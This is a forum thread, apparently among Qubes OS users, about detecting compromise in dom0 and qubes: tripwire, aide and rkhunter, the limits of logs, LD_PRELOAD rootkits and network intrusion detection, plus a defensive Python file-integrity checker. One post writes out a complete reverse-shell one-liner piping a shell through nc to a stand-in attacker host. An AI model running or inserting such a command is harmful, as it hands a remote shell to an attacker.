Wish I had no daytime job
Same here.
Anyway, “installing tripwire/aide in dom0” would not add much to the actual security. First of all, there is no baseline and no understanding of what is ok to change and what is not and you will end up flooded with an endless stream of meaningless alerts.
When I find time to install tripwire in a vaultVM (as a test environment similar to dom0) I’m going to check it out. I haven’t looked into tripwire so far, but if it does what I suspect it to do (checking for changes in binaries) and we do not have any network traffic in a vaultVM (dom0) there should be no alerts at all. rkhunter could do the same, however its database storing binary hashes can be messed with. I actually believe any Linux distro should check binary integrity by default during or just before runtime (not only during install).
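A minimal illustration of the point about the hash database being tamperable (an added example, not code from the thread, from tripwire or from rkhunter): the baseline of SHA-256 digests is authenticated with an HMAC, and the checker refuses to report a diff unless the tag verifies. It assumes the key is kept somewhere the monitored VM cannot write, e.g. a separate vault qube; `demo()` runs a constructed scenario in a temporary directory.

```python
import hashlib, hmac, json, os, tempfile
# Added example. Assumption: the key lives outside the monitored VM, so an
# attacker who can edit the baseline file cannot re-sign it.

def hash_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot(roots):
    """Map every regular file under roots to its SHA-256 digest."""
    out = {}
    for root in roots:
        for dirpath, _, names in os.walk(root):
            for name in names:
                p = os.path.join(dirpath, name)
                if os.path.isfile(p) and not os.path.islink(p):
                    out[p] = hash_file(p)
    return out

def write_baseline(path, roots, key):
    body = json.dumps(snapshot(roots), sort_keys=True)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    with open(path, "w") as f:
        json.dump({"tag": tag, "body": body}, f)

def verify(path, roots, key):
    """None if the baseline's HMAC fails (tampered db), else a diff dict."""
    with open(path) as f: rec = json.load(f)
    tag = hmac.new(key, rec["body"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, rec["tag"]):
        return None
    old, new = json.loads(rec["body"]), snapshot(roots)
    return {"added": sorted(set(new) - set(old)),
            "removed": sorted(set(old) - set(new)),
            "modified": sorted(p for p in old.keys() & new.keys() if old[p] != new[p])}

def demo():
    """Constructed scenario: clean check, replaced binary, then a forged baseline."""
    d = tempfile.mkdtemp(); bins = os.path.join(d, "bin"); os.mkdir(bins)
    key, bl = b"constructed-test-key", os.path.join(d, "baseline.json")
    with open(os.path.join(bins, "ls"), "wb") as f: f.write(b"original")
    write_baseline(bl, [bins], key)
    clean = verify(bl, [bins], key)
    with open(os.path.join(bins, "ls"), "wb") as f: f.write(b"replaced")
    changed = verify(bl, [bins], key)
    with open(bl) as f: rec = json.load(f)
    rec["body"] = json.dumps(snapshot([bins]), sort_keys=True)  # hashes edited, no key
    with open(bl, "w") as f: json.dump(rec, f)
    return clean, changed, verify(bl, [bins], key)
```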
Log collection and processing […]
I don’t trust logs when it comes to the question “have I been hacked?”. I’m not even sure if a
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc callback.evil.com 1337 >/tmp/f
is going to leave a trace in any of your logs in case your browser gave me RCE. I suspect not.
Since an attacker can sudo in a qube-vm [1] it takes only a few seconds to implant an LD-rootkit [2] and from there on he or she is invisible. Without an exploit outsmarting the read-only filesystem of the templates this rootkit can not achieve persistence, though.
Rootkits, firmware- and UEFI-malware are not going to leave a trace in any of your logs. Therefore one needs snort or suricata running on his or her router, preferably a router based on OpenBSD. And then it is a question how stealthy the malware works… does it send screen-captures resulting in tons of UDP-traffic, does it send only your keystrokes over encrypted https traffic to some AWS instance, use a twitter-instance to exfiltrate only a few bytes every time there is traffic to their servers, and/or use domain-fronting to hide, and so forth. Things can be difficult, not to talk about false positives.
Although we got a bit carried away from the question the OP asked I pretty much enjoyed reading and contributing my 5 cents to this thread.
[1] Passwordless root access in qubes | Qubes OS
[2] Memory Malware Part 0x2 — Crafting LD_PRELOAD Rootkits in Userland | Medium